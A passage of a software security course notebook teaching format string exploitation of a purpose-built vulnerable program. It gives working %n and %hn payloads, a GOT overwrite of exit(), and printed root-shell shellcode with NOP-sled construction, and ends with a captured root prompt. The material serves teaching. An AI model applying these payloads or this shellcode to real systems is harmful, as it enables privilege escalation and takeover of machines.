# add %17x%n or -%16x%n
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08JUNK\x1d\xc0\x04\x08JUNK\x1e\xc0\x04\x08JUNK\x1f\xc0\x04\x08")-%x-%x-%123x%n-%16x%n

The right way to print user-controlled input:
�JUNK�JUNK�JUNK�-%x-%x-%123x%n-%16x%n

The wrong way to print user-controlled input:
�JUNK�JUNK�JUNK�-ffffb910-ffffffff-                                                                                                                    80491b0-        4b4e554a

[*] test_val @ 0x0804c01c = 48042 0x0000bbaa
[*] text is @ 0xffffb910


In [77]:
print(0xcc - 0xbb)

17


In [78]:
# now write 0xcc in correct address
# add %17x%n or -%16x%n
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08JUNK\x1d\xc0\x04\x08JUNK\x1e\xc0\x04\x08JUNK\x1f\xc0\x04\x08")-%x-%x-%123x%n-%16x%n-%16x%n

The right way to print user-controlled input:
�JUNK�JUNK�JUNK�-%x-%x-%123x%n-%16x%n-%16x%n

The wrong way to print user-controlled input:
�JUNK�JUNK�JUNK�-ffffb910-ffffffff-                                                                                                                    80491b0-        4b4e554a-        4b4e554a

[*] test_val @ 0x0804c01c = 13417386 0x00ccbbaa
[*] text is @ 0xffffb910


In [79]:
# finally write 0xdd
print(0xdd - 0xcc)

17


In [80]:
# now write 0xdd in correct address
# add %17x%n or -%16x%n
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08JUNK\x1d\xc0\x04\x08JUNK\x1e\xc0\x04\x08JUNK\x1f\xc0\x04\x08")-%x-%x-%123x%n-%16x%n-%16x%n-%16x%n
# note JUNK can be anything

The right way to print user-controlled input:
�JUNK�JUNK�JUNK�-%x-%x-%123x%n-%16x%n-%16x%n-%16x%n

The wrong way to print user-controlled input:
�JUNK�JUNK�JUNK�-ffffb900-ffffffff-                                                                                                                    80491b0-        4b4e554a-        4b4e554a-        4b4e554a

[*] test_val @ 0x0804c01c = -573785174 0xddccbbaa
[*] text is @ 0xffffb900


## Use Direct Parameter Access
- simplified way to exploit format string vulnerability
- allows parameters to be accessed directly by using the argument number (starting from 1) followed by the dollar sign qualifier
    - `%1$d` - access the $1^{st}$ parameter and display it as a decimal number
    - `%2$x` - access the $2^{nd}$ parameter and display it as a hexadecimal number
- instead of sequentially accessing the first three parameters and using 4 bytes spacers of JUNK to increment the byte output count, we can use direct parameter access
- let's write a more realistic-looking address of **0xbffffd72** into the variable test_val in fmt_vuln program
- let's see how direct parameter access works using example provided in demo-programs

In [32]:
!pwd

/home/kali/projects/SoftwareSecurity/demos/fmt_strings/vuln1


In [141]:
! cat ../fmt_directpara.cpp

#include <stdio.h>

int main() {
    printf("7th: %7$d, 4th: %4$05d\n", 10, 20, 30, 40, 50, 60, 70, 80);
    return 0;
}


In [142]:
%%bash
input="../../../demos/fmt_strings/fmt_directpara.cpp"
output="directpara.exe"
g++ -m32 -o $output $input

In [143]:
! ./directpara.exe

7th: 70, 4th: 00040


In [144]:
# without direct access
! ./fmt_vuln.exe AAAA%x%x%x%x
# 4th parameter is where AAAA repeats; if not sure, try one at a time by adding %x

The right way to print user-controlled input:
AAAA%x%x%x%x

The wrong way to print user-controlled input:
AAAAffffb930ffffffff80491b041414141

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb930


In [154]:
# access the 6th argument directly: abcd is the 4th, BBBB the 5th, and AAAA the 6th parameter
# $ is a special character in bash, so it must be escaped
! ./fmt_vuln.exe abcdBBBBAAAA%6\$x
# can try 1 at a time from 1...n until you see AAAA printed in hex

The right way to print user-controlled input:
abcdBBBBAAAA%6$x

The wrong way to print user-controlled input:
abcdBBBBAAAA41414141

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb930
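
The "try 1...n until AAAA shows up" search can be automated. The following is a rough sketch, not part of the demo programs: `find_offset` and `fake_target` are hypothetical names, and `fake_target` is only a stand-in that mimics the stack layout seen in the runs above (three unrelated words, then the input itself).

```python
import struct

def find_offset(run, marker=b"AAAA", max_index=64):
    """Return the first parameter number N for which marker%N$x echoes the marker."""
    wanted = format(struct.unpack("<I", marker)[0], "x").encode()
    for n in range(1, max_index + 1):
        payload = marker + f"%{n}$x".encode()
        if run(payload).endswith(wanted):
            return n
    return None

def fake_target(payload):
    """Hypothetical stand-in for a vulnerable program (not fmt_vuln.exe itself)."""
    # Pad the payload to whole 4-byte words so it can be read as stack words.
    padded = payload + b"\x00" * (-len(payload) % 4)
    words = [0xffffb930, 0xffffffff, 0x080491b0]   # unrelated stack words
    words += [w for (w,) in struct.iter_unpack("<I", padded)]
    marker, spec = payload.split(b"%", 1)
    n = int(spec[:-2].decode())                    # b"4$x" -> 4
    value = words[n - 1] if n <= len(words) else 0
    return marker + format(value, "x").encode()

print(find_offset(fake_target))  # 4
```

Against a real binary, `run` would have to launch the program and return its output; that wrapper is left out here because its details depend on the environment.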


In [155]:
# use the same technique to write to the 4th argument as address
! ./fmt_vuln.exe $(printf "AAAA")%4\$n
# get seg fault - because AAAA is not a valid address

The right way to print user-controlled input:
AAAA%4$n

The wrong way to print user-controlled input:


In [156]:
# no segfault if the 4th argument is a valid memory address
# let's provide test_val's address
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08")%4\$n

The right way to print user-controlled input:
�%4$n

The wrong way to print user-controlled input:
�

[*] test_val @ 0x0804c01c = 4 0x00000004
[*] text is @ 0xffffb940


In [157]:
# no need for JUNK spacers; direct parameter access can target each of the four byte addresses
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08\x1d\xc0\x04\x08\x1e\xc0\x04\x08\x1f\xc0\x04\x08")%4\$n

The right way to print user-controlled input:
����%4$n

The wrong way to print user-controlled input:
����

[*] test_val @ 0x0804c01c = 16 0x00000010
[*] text is @ 0xffffb930


In [158]:
# let's write our controlled address: 0xbffffd72 to test_val
# let's do some math to get 0x72
print(0x72-16)

98


In [159]:
# use the result as width to get 0x72 as least significant value for our controlled address: 0xbffffd72
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08\x1d\xc0\x04\x08\x1e\xc0\x04\x08\x1f\xc0\x04\x08")%98x%4\$n

The right way to print user-controlled input:
����%98x%4$n

The wrong way to print user-controlled input:
����                                                                                          ffffb930

[*] test_val @ 0x0804c01c = 114 0x00000072
[*] text is @ 0xffffb930


In [160]:
# do some math to print 0xfd of our controlled address: 0xbffffd72
print(0xfd-0x72)

139


In [161]:
# use 139 as width to get 0xfd as next value
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08\x1d\xc0\x04\x08\x1e\xc0\x04\x08\x1f\xc0\x04\x08")%98x%4\$n%139x%5\$n

The right way to print user-controlled input:
����%98x%4$n%139x%5$n

The wrong way to print user-controlled input:
����                                                                                          ffffb920                                                                                                                                   ffffffff

[*] test_val @ 0x0804c01c = 64882 0x0000fd72
[*] text is @ 0xffffb920


In [162]:
# do some math to print 0xff of our controlled address: 0xbffffd72
print(0xff-0xfd)

2


In [163]:
# a width of 2 doesn't work: width is only a minimum, and %x prints up to 8 hex digits (4 bytes)
# add 0x100 (0x1ff instead of 0xff) so the width is larger than 8; the extra 1 lands in the next byte, which the next write overwrites
print(0x1ff-0xfd)

258


In [164]:
# use 258 as width to get 0xff as the next value
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08\x1d\xc0\x04\x08\x1e\xc0\x04\x08\x1f\xc0\x04\x08")%98x%4\$n%139x%5\$n%258x%6\$n

The right way to print user-controlled input:
����%98x%4$n%139x%5$n%258x%6$n

The wrong way to print user-controlled input:
����                                                                                          ffffb910                                                                                                                                   ffffffff                                                                                                                                                                                                                                                           80491b0

[*] test_val @ 0x0804c01c = 33553778 0x01fffd72
[*] text is @ 0xffffb910


In [165]:
# do some math to print 0xbf of our controlled address: 0xbffffd72
print(0xbf-0xff)

-64


In [166]:
# a negative width will not work! make 0xbf larger by prepending 1
print(0x1bf-0xff)

192


In [167]:
# use 192 as width to get 0xbf as the most significant byte
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08\x1d\xc0\x04\x08\x1e\xc0\x04\x08\x1f\xc0\x04\x08")%98x%4\$n%139x%5\$n%258x%6\$n%192x%7\$n

The right way to print user-controlled input:
����%98x%4$n%139x%5$n%258x%6$n%192x%7$n

The wrong way to print user-controlled input:
����                                                                                          ffffb910                                                                                                                                   ffffffff                                                                                                                                                                                                                                                           80491b0                                                                                                                                                                                         804c01c

[*] test_val @ 0x0804c01c = -1073742478 0xbffffd72
[*] text is @ 0xffffb910
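
The width arithmetic in the cells above follows one rule: take the difference between the wanted byte and the current output count modulo 256, and add 256 whenever the result is too small to be a safe `%x` width. Here is a small sketch of that rule; the function name and the `min_width=8` default are assumptions chosen to match the reasoning above.

```python
def byte_write_widths(target, already_printed, min_width=8):
    """Widths for four one-byte-at-a-time %n writes, least significant byte first."""
    widths = []
    count = already_printed
    for shift in range(0, 32, 8):
        wanted = (target >> shift) & 0xFF
        pad = (wanted - count) % 256
        if pad < min_width:      # %x may print up to 8 hex digits regardless of width
            pad += 256
        widths.append(pad)
        count += pad
    return widths

print(byte_write_widths(0xbffffd72, 16))  # [98, 139, 258, 192]
```

The 16 passed in is the number of bytes printed for the four addresses before the first `%x`.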


## Using Short (2-byte) Writes
- the `h` length modifier makes `%n` write a `short`, which is typically two bytes
- this lets us write an entire four-byte value with just two `%hn` parameters instead of four `%n` parameters
- let's overwrite test_val variable with the address `0xbffffd72`

| Address | Value |
| --- | --- |
| 0x0804c01c | 0xfd72 |
| 0x0804c01e | 0xbfff |

In [168]:
# plain %n writes the count (27) as a full 4-byte int
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08")%x%x%x%n

The right way to print user-controlled input:
�%x%x%x%n

The wrong way to print user-controlled input:
�ffffb930ffffffff80491b0

[*] test_val @ 0x0804c01c = 27 0x0000001b
[*] text is @ 0xffffb930


In [169]:
# %hn writes only the two low-order bytes; the upper two bytes keep their old value (0xffff)
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08")%x%x%x%hn

The right way to print user-controlled input:
�%x%x%x%hn

The wrong way to print user-controlled input:
�ffffb930ffffffff80491b0

[*] test_val @ 0x0804c01c = -65509 0xffff001b
[*] text is @ 0xffffb930
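
The difference between the two runs above can be reproduced on a plain byte buffer. This is a simplified model, assuming a little-endian 32-bit `int` and a 16-bit `short` as on the i386 target used here; `write_n` is a hypothetical helper, not a libc function.

```python
import struct

def write_n(memory, offset, count, short=False):
    """Model %n (4-byte store) or %hn (2-byte store) of `count` at `offset`."""
    fmt = "<H" if short else "<I"
    mask = 0xFFFF if short else 0xFFFFFFFF
    struct.pack_into(fmt, memory, offset, count & mask)

# test_val starts as -72 (0xffffffb8) in both cases
mem = bytearray(struct.pack("<i", -72))
write_n(mem, 0, 27)
full = struct.unpack("<I", mem)[0]

mem = bytearray(struct.pack("<i", -72))
write_n(mem, 0, 27, short=True)
half = struct.unpack("<I", mem)[0]

print(hex(full), hex(half))  # 0x1b 0xffff001b
```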


In [101]:
# short write can be used with direct parameter access
# update two least significant bytes
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08")%4\$hn

The right way to print user-controlled input:
�%4$hn

The wrong way to print user-controlled input:
�

[*] test_val @ 0x0804c01c = -65532 0xffff0004
[*] text is @ 0xffffb940


In [170]:
# lets write 0xbffffd72 to test_val
#  ./fmt_vuln.exe $(printf "[first byte address][3rd byte address]")%[w]x%4\$hn%[w]x%5\$hn
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08\x1e\xc0\x04\x08")%x%4\$hn

The right way to print user-controlled input:
��%x%4$hn

The wrong way to print user-controlled input:
��ffffb930

[*] test_val @ 0x0804c01c = -65520 0xffff0010
[*] text is @ 0xffffb930


In [171]:
# 0xfd72 goes into the two lower bytes
# the 8 bytes of addresses are printed first, so subtract 8 from the goal

print(0xfd72-8)

64874


In [172]:
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08\x1e\xc0\x04\x08")%64874x%4\$hn

The right way to print user-controlled input:
��%64874x%4$hn

The wrong way to print user-controlled input:
��                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      

In [173]:
# 0xbfff is written in the last two (higher) bytes
print(0xbfff-0xfd72)

-15731


In [174]:
# the result is negative because 0xbfff is smaller than the current count, so prepend 1 to 0xbfff
print(0x1bfff-0xfd72)

49805
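
The two subtractions above generalize to any 32-bit value: work modulo 0x10000 instead of prepending a 1 by hand. A minimal sketch follows, with a hypothetical function name and the same "width must be at least 8" assumption used for `%x` earlier.

```python
def short_write_widths(value, already_printed, min_width=8):
    """Widths for two %hn writes: low half first, then high half."""
    low = value & 0xFFFF
    high = (value >> 16) & 0xFFFF
    first = (low - already_printed) % 0x10000
    if first < min_width:
        first += 0x10000
    second = (high - low) % 0x10000   # the count is already at `low` (mod 0x10000)
    if second < min_width:
        second += 0x10000
    return first, second

print(short_write_widths(0xbffffd72, 8))  # (64874, 49805)
```

Here `already_printed` is 8 because the two 4-byte addresses are echoed before the first `%x`.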


In [175]:
# finally write 0xbffffd72 to test_val using 4th and 5th parameters
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08\x1e\xc0\x04\x08")%64874x%4\$hn%49805x%5\$hn

The right way to print user-controlled input:
��%64874x%4$hn%49805x%5$hn

The wrong way to print user-controlled input:
��                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          

## Control the execution flow of the program
- one option is to overwrite the return address in the most recent stack frame
- a stack-based overflow can typically only overwrite data next to the buffer, such as the return address
- a format string vulnerability, however, provides the ability to overwrite any memory address the program can write to


## Overwriting the Global Offset Table
- See this [stackoverflow question to learn got and plt](https://stackoverflow.com/questions/43048932/why-does-the-plt-exist-in-addition-to-the-got-instead-of-just-using-the-got#:~:text=The%20PLT%20entry%20for%20a,first%20call%20(lazy%20binding).)
- the PLT (procedure linkage table) holds small stubs that are used to call shared library functions
- each time a shared library function is called, control passes through the PLT
- objdump program can be used to see the `.plt` section
- it consists of many jump instructions, each one corresponding to a shared library function
    - run the cell below to see .plt section in fmt_vuln.exe program
- `exit()` is called at the end of the program
- if `exit()` can be manipulated to direct the execution flow into shellcode, a root shell will be spawned (fmt_vuln.exe is setuid root)
- most of these jump instructions do not jump to fixed addresses but through pointers to addresses
    - e.g., exit() function's address is stored at `0x0804c010` (see the relocation records below)
- these pointers live in another section, called the Global Offset Table (GOT), which is writable

In [176]:
! objdump -d -j .plt ./fmt_vuln.exe


./fmt_vuln.exe:     file format elf32-i386


Disassembly of section .plt:

08049020 <__libc_start_main@plt-0x10>:
 8049020:	ff 35 f8 bf 04 08    	push   0x804bff8
 8049026:	ff 25 fc bf 04 08    	jmp    *0x804bffc
 804902c:	00 00                	add    %al,(%eax)
	...

08049030 <__libc_start_main@plt>:
 8049030:	ff 25 00 c0 04 08    	jmp    *0x804c000
 8049036:	68 00 00 00 00       	push   $0x0
 804903b:	e9 e0 ff ff ff       	jmp    8049020 <_init+0x20>

08049040 <printf@plt>:
 8049040:	ff 25 04 c0 04 08    	jmp    *0x804c004
 8049046:	68 08 00 00 00       	push   $0x8
 804904b:	e9 d0 ff ff ff       	jmp    8049020 <_init+0x20>

08049050 <strcpy@plt>:
 8049050:	ff 25 08 c0 04 08    	jmp    *0x804c008
 8049056:	68 10 00 00 00       	push   $0x10
 804905b:	e9 c0 ff ff ff       	jmp    8049020 <_init+0x20>

08049060 <puts@plt>:
 8049060:	ff 25 0c c0 04 08    	jmp    *0x804c00c
 8049066:	68 18 00 00 00       	push   $0x18
 804906b:	e9 b0 ff ff ff       	jmp    8049020 <_init+0x20>

0804907

In [177]:
# look at the .got/.got.plt section headers: DATA without the READONLY flag means WRITABLE
! objdump -h ./fmt_vuln.exe


./fmt_vuln.exe:     file format elf32-i386

Sections:
Idx Name          Size      VMA       LMA       File off  Algn
  0 .interp       00000013  08048194  08048194  00000194  2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  1 .note.gnu.build-id 00000024  080481a8  080481a8  000001a8  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  2 .note.ABI-tag 00000020  080481cc  080481cc  000001cc  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  3 .gnu.hash     00000020  080481ec  080481ec  000001ec  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  4 .dynsym       00000080  0804820c  0804820c  0000020c  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  5 .dynstr       00000068  0804828c  0804828c  0000028c  2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  6 .gnu.version  00000010  080482f4  080482f4  000002f4  2**1
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  7 .gnu.version_r 00000030  08048304  08048

In [178]:
# display all dynamic relocations; a shortcut to see the pointers to the library functions
! objdump -R ./fmt_vuln.exe


./fmt_vuln.exe:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
0804bff0 R_386_GLOB_DAT    __gmon_start__@Base
0804c000 R_386_JUMP_SLOT   __libc_start_main@GLIBC_2.34
0804c004 R_386_JUMP_SLOT   printf@GLIBC_2.0
0804c008 R_386_JUMP_SLOT   strcpy@GLIBC_2.0
0804c00c R_386_JUMP_SLOT   puts@GLIBC_2.0
0804c010 R_386_JUMP_SLOT   exit@GLIBC_2.0




- NOTE: the OFFSET column is the address of each GOT entry; `exit()`'s entry at `0x0804c010` can be overwritten with the address of smuggled shellcode
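
When scripting an exploit it can help to pull the GOT slot out of the `objdump -R` text instead of copying it by hand. The sketch below parses the relocation records shown above; `parse_relocations` is a hypothetical helper and it only looks at `R_386_JUMP_SLOT` lines, which is an assumption that fits this 32-bit binary.

```python
def parse_relocations(objdump_output):
    """Map function name -> GOT slot address from `objdump -R` text."""
    slots = {}
    for line in objdump_output.splitlines():
        parts = line.split()
        if len(parts) == 3 and parts[1] == "R_386_JUMP_SLOT":
            name = parts[2].split("@")[0]      # drop the @GLIBC_x.y suffix
            slots[name] = int(parts[0], 16)
    return slots

sample = """\
0804bff0 R_386_GLOB_DAT    __gmon_start__@Base
0804c000 R_386_JUMP_SLOT   __libc_start_main@GLIBC_2.34
0804c004 R_386_JUMP_SLOT   printf@GLIBC_2.0
0804c008 R_386_JUMP_SLOT   strcpy@GLIBC_2.0
0804c00c R_386_JUMP_SLOT   puts@GLIBC_2.0
0804c010 R_386_JUMP_SLOT   exit@GLIBC_2.0
"""

got = parse_relocations(sample)
print(hex(got["exit"]))  # 0x804c010
```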

## Smuggle Shellcode & Exploit
- create shellcode using gdb-peda - see [GDB-Peda.ipynb](./GDB-Peda.ipynb) Notebook for details
    - use printf bash command to write 'shellcode as a binary file' > shellcode.bin
    - or use shellcode_writer.py script to create binary shellcode
- export shellcode as an env variable
- find the address of the shellcode and write it into the GOT entry of the exit() function
- when the program calls exit(), it actually executes the shellcode in the env variable

### steps
- stash the shellcode in env variable
- find the address of the shellcode when the vulnerable program is loaded
- find shared library function in GOT that's executed by the vulnerable program
- by exploiting format string vulnerability, write the shellcode's address to the shared function's jump address
- put it all together as an exploit code and launch it to exploit the vulnerable program

### Advantage of using GOT
- GOT entries are at fixed addresses for a given binary (when it is not built as a position-independent executable)
    - different system with the same binary will have the same GOT entry at the same address
- ability to overwrite any arbitrary address opens up many possibilities for exploitation
- any section of writable memory that contains an address that directs the flow of program execution can be targeted

In [179]:
! cp ../../../shellcode/shellcode_root.bin .

In [180]:
! ls -al

total 96
drwxr-xr-x 2 kali kali  4096 Sep 18 13:08 .
drwxr-xr-x 3 kali kali  4096 Sep 11 13:07 ..
-rwxr-xr-x 1 kali kali 14996 Sep 18 13:08 directpara.exe
-rw-r--r-- 1 kali kali   100 Sep 18 12:41 exploit_fmt.bin
-rw-r--r-- 1 kali kali   610 Sep 11 13:07 fmt_vuln.cpp
-rwsr-xr-x 1 root root 21412 Sep 13 13:21 fmt_vuln.exe
-rw-r--r-- 1 root root 10384 Sep 13 13:21 fmt_vuln.o
-rw-r--r-- 1 kali kali   500 Sep 15 13:03 getenvaddr.cpp
-rwxr-xr-x 1 kali kali 15028 Sep 15 13:03 getenvaddr.exe
-rw-r--r-- 1 kali kali   870 Sep 11 13:07 Makefile
-rw-r--r-- 1 kali kali    35 Sep 18 13:42 shellcode_root.bin


In [181]:
! pwd

/home/kali/Fa23/SoftwareSecurity/demos/fmt_strings/vuln1


### Use terminal to complete the following steps
- create SHELLCODE env variable

```bash
┌──(kali㉿kali)-[~/…/SoftwareSecurity/demos/fmt_strings/vuln1]
└─$ export SHELLCODE=$(cat ./shellcode_root.bin)

```
- get the address of SHELLCODE env variable when ./fmt_vuln.exe program is executing

```bash
┌──(kali㉿kali)-[~/…/SoftwareSecurity/demos/fmt_strings/vuln1]
└─$ ./getenvaddr.exe SHELLCODE ./fmt_vuln.exe   
SHELLCODE will be at 0xffffcc0b with reference to ./fmt_vuln.exe

```

- now that we know the address of shellcode, let's find out how we can write this address

### Create exploit code and test it to make sure you're writing the correct address

In [116]:
# try 1, 2, 3, 4, etc, until you see hex A's printed
# we note that the 4th parameter starts printing AAAA for fmt_vuln.exe
! ./fmt_vuln.exe $(printf "AAAA")%4\$x

The right way to print user-controlled input:
AAAA%4$x

The wrong way to print user-controlled input:
AAAA41414141

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb940


In [118]:
# let's write the SHELLCODE address 0xffffcc0b to test_val to make sure we can do it
# we can then use the calculations to write to exit function's location in GOT
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08\x1e\xc0\x04\x08")%4\$hn

The right way to print user-controlled input:
��%4$hn

The wrong way to print user-controlled input:
��

[*] test_val @ 0x0804c01c = -65528 0xffff0008
[*] text is @ 0xffffb930


In [119]:
# find the first width; # SHELLCODE will be at 0xffffcc0b
# 8 bytes of addresses will be printed
print(0xcc0b-8)

52227


In [120]:
# find the 2nd width; # SHELLCODE will be at 0xffffcc0b
print(0xffff-0xcc0b)

13300


In [124]:
# let's write SHELLCODE's address 0xffffcc0b to test_val for quick testing
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08\x1e\xc0\x04\x08")%52227x%4\$hn%13300x%5\$hn

The right way to print user-controlled input:
��%52227x%4$hn%13300x%5$hn

The wrong way to print user-controlled input:
��                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          

In [122]:
# find the exit function's address in GOT and write SHELLCODE address to it
! objdump -R ./fmt_vuln.exe | grep exit

0804c010 R_386_JUMP_SLOT   exit@GLIBC_2.0


In [123]:
# find the address of the upper two bytes of exit's GOT entry
print(hex(0x10+2))

0x12


In [127]:
# Simply replace test_val's address with exit() address in the same order
! ./fmt_vuln.exe $(printf "\x10\xc0\x04\x08\x12\xc0\x04\x08")%52227x%4\$hn%13300x%5\$hn

The right way to print user-controlled input:
��%52227x%4$hn%13300x%5$hn

The wrong way to print user-controlled input:
��                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          

### Finally, run the crafted command from a Terminal
- the vulnerable program should execute the stashed shellcode
- you should see a root prompt that you can interact with

```bash
...
...

[*] test_val @ 0x0804c028 = -72 0xffffffb8
[*] text is @ 0xffffbed0
# whoami
root
# cls
/bin//sh: 2: cls: not found
# clear
TERM environment variable not set.
# ls
Makefile  directpara.exe  fmt_vuln.cpp  fmt_vuln.exe  fmt_vuln.o  getenvaddr.cpp  getenvaddr.exe  shellcode_root.bin
# 
```
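
Putting the pieces of this section together, the argument passed to the program is two little-endian addresses followed by two `%hn` writes. The following sketch rebuilds that byte string from the GOT slot, the shellcode address, and the parameter number found earlier. `got_overwrite_payload` is a made-up helper name, and the sketch assumes none of the address bytes is zero, since a NUL byte cannot be passed in a command-line argument.

```python
import struct

def got_overwrite_payload(slot_addr, value, first_param, min_width=8):
    """Addresses of both halves of the slot + two %hn writes that store `value`."""
    addresses = struct.pack("<II", slot_addr, slot_addr + 2)
    low, high = value & 0xFFFF, (value >> 16) & 0xFFFF
    w1 = (low - len(addresses)) % 0x10000   # the 8 address bytes are printed first
    if w1 < min_width:
        w1 += 0x10000
    w2 = (high - low) % 0x10000
    if w2 < min_width:
        w2 += 0x10000
    fmt = f"%{w1}x%{first_param}$hn%{w2}x%{first_param + 1}$hn"
    return addresses + fmt.encode()

payload = got_overwrite_payload(0x0804c010, 0xffffcc0b, 4)
print(payload)
```

With the values from this section the result matches the hand-built command: the slot addresses `0x0804c010` and `0x0804c012`, then widths 52227 and 13300.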

## Smuggle shellcode into the text buffer
- instead of stashing the shellcode in an environment variable, send it to the program as part of the input and make the program execute it by overwriting exit()'s entry in the GOT

### Steps
1. create a string in this format: `| NOP Sled | Shellcode |`
2. Find the address of text buffer
3. Find the address of `exit( )`
4. Overwrite the address of exit with the address of text buffer
    - exploit format string vulnerability to overwrite any address with your controlled address where the shellcode is stashed

In [182]:
! pwd

/home/kali/Fa23/SoftwareSecurity/demos/fmt_strings/vuln1


In [183]:
# find the size of exploit code
! wc -c ./shellcode_root.bin
# shellcode is 35 bytes

35 ./shellcode_root.bin


In [184]:
# make the total length a multiple of 4 (not strictly necessary)
# let's create a string 100 bytes long (25*4)
# find the length of the NOP sled so that sled + shellcode is 100 bytes
25*4-35

65

In [185]:
# text buffer is 1024 bytes big
! python -c 'import sys; sys.stdout.buffer.write(b"\x90"*65)' > exploit_fmt.bin

In [186]:
! wc -c ./exploit_fmt.bin

65 ./exploit_fmt.bin


In [187]:
! hexdump -C exploit_fmt.bin

00000000  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000040  90                                                |.|
00000041


In [188]:
# let's append the shellcode to the exploit code after the NOP sled
! cat shellcode_root.bin >> exploit_fmt.bin

In [189]:
! wc -c exploit_fmt.bin

100 exploit_fmt.bin


In [190]:
! hexdump -C exploit_fmt.bin

00000000  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000040  90 31 c0 31 db 31 c9 99  b0 a4 cd 80 6a 0b 58 51  |.1.1.1......j.XQ|
00000050  68 2f 2f 73 68 68 2f 62  69 6e 89 e3 51 89 e2 53  |h//shh/bin..Q..S|
00000060  89 e1 cd 80                                       |....|
00000064
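
The same `| NOP Sled | Shellcode |` layout can be produced in one step. This is a minimal sketch with a hypothetical `build_sled` helper; the 35 placeholder bytes only stand in for the contents of shellcode_root.bin and are not real shellcode.

```python
NOP = b"\x90"

def build_sled(shellcode, total_len):
    """Left-pad `shellcode` with NOPs so the result is exactly `total_len` bytes."""
    if len(shellcode) > total_len:
        raise ValueError("shellcode is longer than the requested total length")
    return NOP * (total_len - len(shellcode)) + shellcode

# Placeholder: 35 arbitrary non-NOP bytes, the same size as shellcode_root.bin.
placeholder = bytes(range(1, 36))
blob = build_sled(placeholder, 100)
print(len(blob), blob.count(NOP))  # 100 65
```

In practice the placeholder would be replaced by the bytes read from the shellcode file, and the result written out in binary mode.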


### Find the address of `text` buffer 
- typically found using gdb
- the actual address of the text buffer is not easy to find
- it shifts depending on the arguments passed to the program (their size matters), environment variables, program name, etc.
- see [Buffer Overflow Basics](./BufferOverflowBasics.ipynb) chapter for details
- we get a different value outside gdb
- there are workarounds, but they are a little tedious...
- for the sake of learning and ease, the program prints the address of text!

In [191]:
! ./fmt_vuln.exe $(python -c 'print("A"*50)')
# notebook gives different address than the terminal; try it!

The right way to print user-controlled input:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

The wrong way to print user-controlled input:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb910


In [193]:
! ./fmt_vuln.exe $(python -c 'print("A"*200)')
# text is at different address as the argument is longer

The right way to print user-controlled input:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

The wrong way to print user-controlled input:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb880


### Do the following directly on a Terminal
- address of text buffer changes depending on where and how the program is run (with various length of argument) as shown above

- find the right parameter number that starts repeating the AAAA in hex (41414141)
     - try 1 2 ... n

- after trial and error, the 29th parameter prints 41414141 (AAAA) again

```bash
┌──(kali㉿kali)-[~/…/SoftwareSecurity/demos/fmt_strings/vuln1]
└─$ ./fmt_vuln.exe $(cat exploit_fmt.bin)$(printf "AAAABBBB")%29\$x
The right way to print user-controlled input:
�����������������������������������������������������������������1�1�1ə��j
                                                                          XQh//shh/bin��Q��S��AAAABBBB%29$x

The wrong way to print user-controlled input:
�����������������������������������������������������������������1�1�1ə��j
                                                                          XQh//shh/bin��Q��S��AAAABBBB41414141

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb5c0

```

- let's use test_val's address to write controlled address for testing
- note the value used for this first trial (`0xffffffb8`); the address of text printed above is `0xffffb5c0`
